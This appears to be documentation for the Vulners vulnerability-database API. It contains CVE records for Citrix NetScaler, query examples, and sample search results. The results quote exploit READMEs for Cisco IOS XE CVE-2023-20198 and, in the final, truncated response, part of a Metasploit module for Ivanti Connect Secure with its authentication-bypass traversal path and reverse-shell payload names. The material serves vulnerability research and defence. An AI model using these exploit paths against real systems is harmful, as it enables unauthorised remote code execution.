                            "matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
                            "versionStartIncluding": "14.1",
                            "versionEndExcluding": "14.1-12.35",
                            "matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
                            "versionStartIncluding": "13.0",
                            "versionEndExcluding": "13.0-92.21",
                            "matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-51.15",
                            "matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
                            "versionStartIncluding": "14.1",
                            "versionEndExcluding": "14.1-12.35",
                            "matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
                        }
                    ]
                }
            ]
        },
        "extraReferences": [
            {
                "url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
                "source": "[email protected]",
                "tags": [
                    "Vendor Advisory"
                ]
            }
        ],
        "product_info": [
            {
                "vendor": "Cloud Software Group",
                "product": "NetScaler ADC"
            },
            {
                "vendor": "Cloud Software Group",
                "product": "NetScaler Gateway"
            }
        ],
        "solutions": [],
        "workarounds": [],
        "impacts": [],
        "problemTypes": [
            {
                "descriptions": [
                    {
                        "cweId": "CWE-94",
                        "description": "CWE-94 Improper Control of Generation of Code ('Code Injection')",
                        "lang": "en",
                        "type": "CWE"
                    }
                ]
            }
        ],
        "exploits": [],
        "assigned": "2023-12-06T11:01:54"
    },
    "CVE-2023-6549": {
        "id": "CVE-2023-6549",
        "vendorId": null,
        "type": "cve",
        "bulletinFamily": "NVD",
        "title": "CVE-2023-6549",
        "description": "Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service \n",
        "published": "2024-01-17T21:15:11",
        "modified": "2024-01-24T20:48:33",
        "epss": [
            {
                "cve": "CVE-2023-6549",
                "epss": 0.00724,
                "percentile": 0.80045,
                "modified": "2024-02-11"
            }
        ],
        "cvss": {
            "score": 5.0,
            "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        "cvss2": {
            "cvssV2": {
                "version": "2.0",
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "accessVector": "NETWORK",
                "accessComplexity": "LOW",
                "authentication": "NONE",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0
            },
            "severity": "MEDIUM",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "acInsufInfo": false,
            "obtainAllPrivilege": false,
            "obtainUserPrivilege": false,
            "obtainOtherPrivilege": false,
            "userInteractionRequired": false
        },
        "cvss3": {
            "cvssV3": {
                "version": "3.1",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "attackVector": "NETWORK",
                "attackComplexity": "LOW",
                "privilegesRequired": "NONE",
                "userInteraction": "NONE",
                "scope": "UNCHANGED",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH"
            }
        },
        "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6549",
        "reporter": "[email protected]",
        "references": [
            "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
        ],
        "cvelist": [
            "CVE-2023-6549"
        ],
        "immutableFields": [],
        "lastseen": "2024-02-12T11:56:58",
        "viewCount": 108,
        "enchantments": {
            "dependencies": {
                "references": [
                    {
                        "type": "attackerkb",
                        "idList": [
                            "AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
                        ]
                    },
                    {
                        "type": "cisa_kev",
                        "idList": [
                            "CISA-KEV-CVE-2023-6549"
                        ]
                    },
                    {
                        "type": "citrix",
                        "idList": [
                            "CTX584986"
                        ]
                    },
                    {
                        "type": "hivepro",
                        "idList": [
                            "HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
                        ]
                    },
                    {
                        "type": "malwarebytes",
                        "idList": [
                            "MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
                        ]
                    },
                    {
                        "type": "nessus",
                        "idList": [
                            "NETSCALER_ADC_GATEWAY_CTX584986.NASL"
                        ]
                    },
                    {
                        "type": "prion",
                        "idList": [
                            "PRION:CVE-2023-6549"
                        ]
                    },
                    {
                        "type": "thn",
                        "idList": [
                            "THN:55036E69D47D64800FB4CB6F8068DA4F"
                        ]
                    }
                ]
            },
            "score": {
                "value": 8.2,
                "uncertanity": 0.1,
                "vector": "NONE"
            },
            "reddit": {
                "counter": 24,
                "posts": [
                    {
                        "link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
                        "text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
                        "author": "SirEliasRiddle",
                        "author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
                        "date": "2024-01-18T23:43:43+00:00"
                    }
                ]
            },
            "exploitation": {
                "wildExploitedSources": [
                    {
                        "type": "attackerkb",
                        "idList": [
                            "AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
                        ]
                    },
                    {
                        "type": "cisa_kev",
                        "idList": [
                            "CISA-KEV-CVE-2023-6549"
                        ]
                    }
                ],
                "wildExploited": true
            },
            "short_description": "CVE-2023-6549 Denial of Servic",
            "tags": [
                "cve-2023-6549",
                "denial of service",
                "nvd"
            ],
            "vulnersScore": 8.2
        },
        "cna_cvss": {
            "cna": "Citrix",
            "cvss": {
                "3": {
                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
                    "score": 8.2
                }
            }
        },
        "cpe": [],
        "cpe23": [],
        "cwe": [
            "CWE-119",
            "CWE-119"
        ],
        "affectedSoftware": [
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "12.1-55.302",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.0-92.21",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.1-37.176",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.1-51.15",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "14.1-12.35",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "13.0-92.21",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "13.1-51.15",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "14.1-12.35",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            }
        ],
        "affectedConfiguration": [],
        "cpeConfiguration": {
            "nodes": [
                {
                    "operator": "OR",
                    "negate": false,
                    "cpeMatch": [
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
                            "versionStartIncluding": "12.1",
                            "versionEndExcluding": "12.1-55.302",
                            "matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
                            "versionStartIncluding": "12.1",
                            "versionEndExcluding": "12.1-55.302",
                            "matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
                            "versionStartIncluding": "13.0",
                            "versionEndExcluding": "13.0-92.21",
                            "matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-37.176",
                            "matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-51.15",
                            "matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
                            "versionStartIncluding": "14.1",
                            "versionEndExcluding": "14.1-12.35",
                            "matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
                            "versionStartIncluding": "13.0",
                            "versionEndExcluding": "13.0-92.21",
                            "matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-51.15",
                            "matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
                            "versionStartIncluding": "14.1",
                            "versionEndExcluding": "14.1-12.35",
                            "matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
                        }
                    ]
                }
            ]
        },
        "extraReferences": [
            {
                "url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
                "source": "[email protected]",
                "tags": [
                    "Vendor Advisory"
                ]
            }
        ],
        "product_info": [
            {
                "vendor": "Cloud Software Group",
                "product": "NetScaler ADC"
            }
        ],
        "solutions": [],
        "workarounds": [],
        "impacts": [],
        "problemTypes": [
            {
                "descriptions": [
                    {
                        "cweId": "CWE-119",
                        "description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer",
                        "lang": "en",
                        "type": "CWE"
                    }
                ]
            }
        ],
        "exploits": [],
        "assigned": "2023-12-06T11:01:58"
    }
}

Public available exploits

Specify a vulnerability or software identifier to obtain publicly available exploits from the Vulners database using this method.

Required parameters:

  • query (str): Search query by Lucene syntax
  • skip (int)
  • size (int): count of output elements
  • apiKey: Activated API key

Query:

POST /api/v3/search/lucene/

Query example for software identifier:

curl -XPOST https://vulners.com/api/v3/search/lucene/ -H  'Content-Type: application/json' -d '{
"query": "cisco ios xe", 
"skip": 0, 
"size": 100, 
"fields": [
    "id", 
    "title", 
    "description", 
    "type", 
    "bulletinFamily", 
    "cvss", 
    "published", 
    "modified", 
    "lastseen", 
    "href", 
    "sourceHref", 
    "sourceData", 
    "cvelist", 
    "sourceData"], 
"apiKey": "{API key}"
}'

Query example for CVE (vulnerability):

curl -XPOST https://vulners.com/api/v3/search/lucene/ -H  'Content-Type: application/json' -d '{
"query": "CVE-2023-20198", 
"skip": 0, 
"size": 100, 
"fields": [
    "id", 
    "title", 
    "description", "type", 
    "bulletinFamily", 
    "cvss", 
    "published", 
    "modified", 
    "lastseen", 
    "href", 
    "sourceHref", 
    "sourceData", 
    "cvelist", 
    "sourceData"],  
"apiKey": "{API key}"
}'

Example with search method:

curl -XPOST https://vulners.com/api/v3/search/lucene/ -H  'Content-Type: application/json' -d '{
"query": "bulletinFamily:exploit AND cisco ios xe", 
"skip": 0,
"size": 10,
"fields": [
    "id", 
    "title", 
    "description", 
    "type", 
    "bulletinFamily", 
    "cvss", 
    "published", 
    "modified", 
    "lastseen", 
    "href", 
    "sourceHref", 
    "sourceData", 
    "cvelist"], 
"apiKey": "{API key}"
}'
wordpress_exploits = vulners_api.find_exploit_all("cisco ios xe")
cve_exploits = vulners_api.find_exploit_all("CVE-2023-20198", limit=5)
search_exploits = vulners_api.find_all("bulletinFamily:exploit AND cisco ios xe", limit=5)
[
    {
        "lastseen": "2024-02-12T21:19:02",
        "bulletinFamily": "exploit",
        "cvelist": [
            "CVE-2023-20198"
        ],
        "description": "# CVE 2023-20198\n<img width=\"518\" alt=\"Screenshot 2023-10-23 234005\" src=\"https://github.com/Pushkarup/CVE-2023-20198/assets/148672587/f14ad83f-0758-4cca-8a5b-f851112c2ae4\">\n\n## Introduction\nThe web UI component of Cisco IOS XE Software has a previously undiscovered vulnerability that, when exposed to the internet or untrusted networks, is already being actively exploited, according to Cisco. Due to this vulnerability, a remote, unauthenticated attacker is able to set up an account with privilege level 15 access on a vulnerable system. Afterward, the attacker can take control of the compromised machine using that account.\n\nCVE-2023-20198 is a privilege escalation vulnerability affecting Cisco IOS XE software, receiving the highest possible CVSS score of 10. Successful exploitation of this vulnerability would allow an attacker to create a user account with full administrative privileges.\n\n## Disclaimer: Educational Purpose Only\n\nThis Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this PoC is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.\n\n### Important Points:\n- **Ethical Use:** This PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.\n- **Responsible Disclosure:** If you discover vulnerabilities as a result of this PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.\n- **No Endorsement:** This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.\n\nBy accessing and using this PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.\n\n## Features\n\n- **User Creation:** Demonstrates the creation of a local user account on a target web application.\n- **Implant Installation:** Installs an implant configuration on the target web application.\n- **Web Server Restart:** Restarts the web server on the target to activate the implant.\n- **Implant Status Check:** Checks the status of the implanted code on the target.\n\n## Getting Started\n\n### Prerequisites\n\n- Python 3.x\n- Required Python packages: `requests`, `colorama`\n\n### Installation\n\n1. Clone the repository:\n\n    ```bash\n    git clone https://github.com/Pushkarup/CVE-2023-20198.git\n    cd CVE-2023-20198\n    ```\n\n2. Install the required Python packages:\n\n    ```bash\n    pip install colorama\n    pip install requests\n    ```\n\n## Usage\n\n\n1. Create a text file containing the target sites (one per line) and save it with a `.txt` extension.\n \u2022Collect site list for test using dork `labels='cisco-xe-webui'`\n\n2. Edit the Variable config_content in line 121 according to your need . Below is a sample config\n   ```python\n    config_content = \"\"\"\n    #This is a sample configuration content\n    param1: value1\n    param2: value2\n    nested_params:\n         nested_param1: nested_value1\n         nested_param2: nested_value2\n   \"\"\"\n    ```\n\n3. Run the script:\n\n    ```bash\n    python main.py\n    ```\n\n4. Follow the prompts to process the target sites.\n\n## Contributing\n\nContributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.\n\n## License\n\nThis project is licensed under the [MIT License](LICENSE).\n\n\n## Contact\n\n- GitHub: [Pushkar Upadhyay](https://github.com/Pushkarup)\n- LinkedIn: [Pushkar Upadhyay](www.linkedin.com/in/pushkar-upadhyay-24p)\n\n## Donations\n### Show your support\n- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP\n- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n",
        "modified": "2024-02-12T20:11:46",
        "published": "2023-10-23T16:04:23",
        "id": "AA1E22FF-1D43-5A38-ABAB-A17B2738EF68",
        "href": "https://github.com/Pushkarup/CVE-2023-20198",
        "type": "githubexploit",
        "title": "Exploit for Vulnerability in Cisco Ios Xe",
        "cvss": {
            "score": 7.5,
            "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "vhref": "https://vulners.com/githubexploit/AA1E22FF-1D43-5A38-ABAB-A17B2738EF68"
    },
    {
        "lastseen": "2024-02-12T15:43:37",
        "bulletinFamily": "exploit",
        "cvelist": [
            "CVE-2023-20198"
        ],
        "description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 &amp; 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
        "modified": "2024-01-19T23:21:16",
        "published": "2023-10-17T22:41:14",
        "id": "5770078F-F5C7-5063-98C6-7C111F447FB3",
        "href": "https://github.com/ZephrFish/CVE-2023-20198-Checker",
        "type": "githubexploit",
        "title": "Exploit for Vulnerability in Cisco Ios Xe",
        "cvss": {
            "score": 7.5,
            "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "vhref": "https://vulners.com/githubexploit/5770078F-F5C7-5063-98C6-7C111F447FB3"
    },
    {
        "lastseen": "2024-02-12T21:23:04",
        "bulletinFamily": "exploit",
        "cvelist": [
            "CVE-2023-20198"
        ],
        "description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 &amp; 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
        "modified": "2024-01-19T23:21:16",
        "published": "2023-10-17T22:41:14",
        "id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
        "href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
        "type": "githubexploit",
        "title": "Exploit for Vulnerability in Cisco Ios Xe",
        "cvss": {
            "score": 7.5,
            "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
    },
    {
        "lastseen": "2024-02-12T21:24:10",
        "bulletinFamily": "exploit",
        "cvelist": [
            "CVE-2023-20198"
        ],
        "description": "# CVE-2023-20198\nCVE-2023-20198 Checkscript based on: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/\nIncluding the updated where there is an Authorization header to check for the known implant. \n\n!! Upgraded to look for upgraded implant \n\n\n\nThe script checks length of returned response with code 200, and checks if length is shorter then 32 characters. Each IP returning shorter length than 32 chars should be checked to se if device is compromised. This script *only* gives you an indicator, not proof that the device is compromised.\n\nThe script also checks if the implant has been upgraded, as dicovered by Fox-IT: https://github.com/fox-it/cisco-ios-xe-implant-detection\n\n\nRun:\n\n```\npython cve-2023-20198.py\n\n\nand enter you desired subnet to scan. For example:\n\npython CVE-2023-20198\n\n\nEnter the subnet (CIDR notation): 10.0.0.0/22\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.96 - Status: 200\n\nIP: 10.0.0.96 - Response is a potentially suspicious: \n\n\nIPs with status code 200, suspicious length, should be checked:\n\n['10.0.0.96']\n\nIPs with status code 200, but no IOC:\n\n[]\n```\n",
        "modified": "2023-12-30T09:37:12",
        "published": "2023-10-17T08:00:18",
        "id": "6D32CD31-2C1D-55F0-B50B-6833D29C48AF",
        "href": "https://github.com/Atea-Redteam/CVE-2023-20198",
        "type": "githubexploit",
        "title": "Exploit for Vulnerability in Cisco Ios Xe",
        "cvss": {
            "score": 7.5,
            "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "vhref": "https://vulners.com/githubexploit/6D32CD31-2C1D-55F0-B50B-6833D29C48AF"
    },
    {
        "lastseen": "2024-02-12T15:25:45",
        "bulletinFamily": "exploit",
        "cvelist": [
            "CVE-2023-20198"
        ],
        "description": "# CVE-2023-20198-\n\n\nCVE-2023-20198 / 0day - Cisco - Authentication Bypass/RCE\n\n![Screenshot 2023-12-14 013414](https://github.com/codeb0ss/CVE-2023-20198-PoC/assets/135759201/084a2160-318d-4fb6-8048-4e198b494802)\n",
        "modified": "2023-12-14T20:23:00",
        "published": "2023-12-13T22:45:25",
        "id": "351C2762-84D8-562F-877D-B2A6D797418F",
        "href": "https://github.com/codeb0ss/CVE-2023-20198-PoC",
        "type": "githubexploit",
        "title": "Exploit for Vulnerability in Cisco Ios Xe",
        "cvss": {
            "score": 7.5,
            "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "vhref": "https://vulners.com/githubexploit/351C2762-84D8-562F-877D-B2A6D797418F"
    }
]

Vulnerabilities/exploits by software name

Vulnerabilities by software + version:

Required parameters:

Note

The software name can be a non-exact match, such as "ivanti connect secure", "connect secure", "connect_secure", etc. However, it is better to specify the exact version to obtain precise results.

  • software (str): name of the software. For example, "httpd".
  • apiKey: Activated API key to authenticate the request.

Optional parameters:

  • version (str): version of the software. For example, "2.1".
  • vendor (str): The vendor of the software. For example, "Apache".
  • respect_major_version (str): If true, limits results to the specified major version. Default is false.
  • exclude_any_version (str): If true, excludes extended versions and returns only the exact match. Default is false.
  • only_ids (bool): If true, returns only the IDs of the vulnerabilities. Default is false.

Query:

POST /api/v3/burp/softwareapi/

Query example:

curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H  'Content-Type: application/json' -d '{
    "software": "connect secure", 
    "version": "22.3",
    "vendor": "Ivanti",
    "respect_major_version": "true",
    "exclude_any_version": "true",
    "only_ids": "false",
    "maxVulnerabilities": 10,
    "apiKey": "{API key}"
}'

results = vulners_api.get_software_vulnerabilities(
    name="connect secure",
    version="22.3",
    vendor="Ivanti",
    respect_major_version="true",
    exclude_any_version="true",
    only_ids="false"
)
exploit_list = results.get('exploit')
vulnerabilities_list = [results.get(key) for key in results if key in ['exploit']]
[
    [
        {
            "id": "1337DAY-ID-39263",
            "type": "zdt",
            "bulletinFamily": "exploit",
            "title": "Ivanti Connect Secure Unauthenticated Remote Code Execution Exploit",
            "description": "This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.",
            "published": "2024-01-22T00:00:00",
            "modified": "2024-01-22T00:00:00",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://0day.today/exploit/description/39263",
            "cvelist": [
                "CVE-2023-46805",
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-12T12:57:46",
            "sourceHref": "https://0day.today/exploit/39263",
            "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n        'Description' => %q{\n          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n          also vulnerable.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n        ],\n        'References' => [\n          ['CVE', '2023-46805'], # The auth bypass vulnerability.\n          ['CVE', '2024-21887'], # The command injection vulnerability.\n          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n        ],\n        'DisclosureDate' => '2024-01-10',\n        'Platform' => %w[linux unix],\n        'Arch' => [ARCH_CMD],\n        'Privileged' => true, # Code execution as root.\n        'Targets' => [\n          [\n            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n            # cmd/linux/http/x64/meterpreter/reverse_tcp\n            # cmd/linux/http/x64/shell/reverse_tcp\n            # cmd/linux/http/x86/shell/reverse_tcp\n            'Linux Command',\n            {\n              'Platform' => 'linux',\n              'Arch' => [ARCH_CMD]\n            },\n          ],\n          [\n            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n            # cmd/unix/python/meterpreter/reverse_tcp\n            # cmd/unix/reverse_bash\n            # cmd/unix/reverse_python\n            'Unix Command',\n            {\n              'Platform' => 'unix',\n              'Arch' => [ARCH_CMD]\n            },\n          ]\n        ],\n        'DefaultOptions' => {\n          'RPORT' => 443,\n          'SSL' => true,\n          'FETCH_WRITABLE_DIR' => '/tmp'\n        },\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS]\n        }\n      )\n    )\n  end\n\n  def check\n    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n    # the target system version information. If this requests succeeds, the target is vulnerable.\n    res = send_request_cgi(\n      'method' => 'GET',\n      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n    )\n\n    return CheckCode::Unknown('Connection failed') unless res\n\n    # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n    return CheckCode::Safe if res.code != 200\n\n    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n    # response, this is only 